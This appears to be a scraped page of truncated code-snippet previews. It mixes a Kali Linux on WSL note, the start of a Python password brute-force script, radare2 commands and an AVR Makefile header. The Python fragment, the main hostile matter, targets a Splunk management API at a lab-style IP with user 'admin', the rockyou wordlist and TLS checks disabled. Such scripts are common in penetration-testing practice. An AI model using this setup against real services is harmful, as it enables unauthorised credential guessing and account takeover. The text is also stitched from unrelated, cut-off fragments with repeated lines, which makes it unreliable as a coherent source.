Kali Linux on Windows Subsystem for Linux (WSL)
This doc describes how to install Kali Linux on WSLv2.
WSL Docs
https://docs.microsoft.com/en-us/windows/wsl/about
import multiprocessing.dummy as mp | |
import requests | |
#curl -k -u admin:pass https://10.10.10.209:8089/services | |
requests.packages.urllib3.disable_warnings() | |
URL = "https://10.10.10.209:8089/services" | |
USERNAME = 'admin' | |
passwords = open("/usr/share/KaliLists/rockyou.txt", 'rb').read().strip().splitlines() | |
count_progress = 0 |
This doc describes how to install Kali Linux on WSLv2.
https://docs.microsoft.com/en-us/windows/wsl/about
load without any analysis (file header at offset 0x0): r2 -n /path/to/file
aa
iS
afl
ii
ie
s sym.main
# Name: Makefile | |
# Author: <insert your name here> | |
# Copyright: <insert your copyright message here> | |
# License: <insert your license reference here> | |
# DEVICE ....... The AVR device you compile for | |
# CLOCK ........ Target AVR clock rate in Hertz | |
# OBJECTS ...... The object files created from your source files. This list is | |
# usually the same as the list of source files with suffix ".o". | |
# PROGRAMMER ... Options to avrdude which define the hardware you use for |